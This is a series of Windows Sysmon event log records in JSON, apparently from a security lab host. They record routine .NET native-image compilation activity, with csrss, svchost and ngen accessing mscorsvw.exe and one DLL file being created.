{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8003,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.340\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CE-5F25-0000-00102BE01000}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.340","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CE-5F25-0000-00102BE01000}","TargetProcessId":"872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8004,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CE-5F25-0000-00102BE01000}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CE-5F25-0000-00102BE01000}","TargetProcessId":"872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8005,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:29.434\r\nProcessGuid: {A837DB8D-04FD-5F25-0000-0010E0841200}\r\nProcessId: 872\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\368-0\\UIAutomationProvider.dll\r\nCreationUtcTime: 2020-08-01 06:00:29.434","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:29.434","ProcessGuid":"{A837DB8D-04FD-5F25-0000-0010E0841200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\368-0\\UIAutomationProvider.dll","CreationUtcTime":"2020-08-01 06:00:29.434","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8006,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.465\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-001089881200}\r\nTargetProcessId: 4944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.465","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-001089881200}","TargetProcessId":"4944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8007,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.465\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-001089881200}\r\nTargetProcessId: 4944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.465","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-001089881200}","TargetProcessId":"4944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8008,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.465\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-001089881200}\r\nTargetProcessId: 4944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.465","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-001089881200}","TargetProcessId":"4944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8009,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.512\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-0010FB8B1200}\r\nTargetProcessId: 3804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.512","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-0010FB8B1200}","TargetProcessId":"3804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8010,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.512\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-0010FB8B1200}\r\nTargetProcessId: 3804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.512","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-0010FB8B1200}","TargetProcessId":"3804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8011,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.512\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-0010FB8B1200}\r\nTargetProcessId: 3804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.512","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-0010FB8B1200}","TargetProcessId":"3804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
